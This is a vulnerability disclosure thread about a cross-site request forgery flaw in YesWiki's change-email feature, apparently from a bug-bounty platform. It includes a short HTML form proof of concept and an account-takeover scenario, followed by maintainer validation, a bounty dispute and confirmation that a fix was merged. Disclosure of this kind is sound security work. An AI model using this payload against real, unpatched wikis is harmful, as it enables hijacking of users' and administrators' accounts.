Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki


Reported on

Dec 6th 2021


Hey all,

so i found that YesWiki doesn't implement any sort of anti-csrf mechanism, i found that the change email function is vulnerable to CSRF attacks which leads to Account Takeover.

Proof of Concept

    <form method="POST" action="">
      <input type="hidden" name="usersettings_action" value="update"/>
      <input type="hidden" name="email" value=""/>
      <input type="hidden" name="revisioncount" value="20"/>
      <input type="submit" value="Submit">

Exploitation Scenario:

  • An attacker sends the above PoC to the victim.

  • rather than submit, the autosubmit attribute could be implemented, so the victim's email will be changed and he will be redirected to a third site.

  • an attacker now will reset his password via the changed email and he will be able to takeover the account.

NOTE: the attack could be applied to the admin account user which could be harmful to other users leading to compromise their confidentiality, integrity and availability.

Remediation Actions:

Implementing a anti-csrf AND/OR anti-csrf header with server-side checks should be sufficient to resolve the root cause of the issue.


Taking over user accounts.

Best Regards,


We are processing your report and will contact the yeswiki team within 24 hours. 6 months ago
Moad Akhraz
6 months ago


hey @maintainer, we can work on a fix if you want, please ping me using @researcher.



We have contacted a member of the yeswiki team and are waiting to hear back 6 months ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. 6 months ago
Jérémy Dufraisse validated this vulnerability 6 months ago
Moad Akhraz has been awarded the disclosure bounty
The fix bounty is now up for grabs
Moad Akhraz
6 months ago


Hey @admin, i think that a CSRF that leads to Account Takeover deserves more than $5 ??

Jamie Slome
5 months ago


Hello @mdakh404, I would recommend creating an issue on our public roadmap where you can share your thoughts!

Moad Akhraz
5 months ago


Hello @j9rem, can you please deploy a fix for this one ?

Jérémy Dufraisse confirmed that a fix has been merged on f72309 3 months ago
Jérémy Dufraisse has been awarded the fix bounty
usersettings.php#L119-L127 has been validated
to join this conversation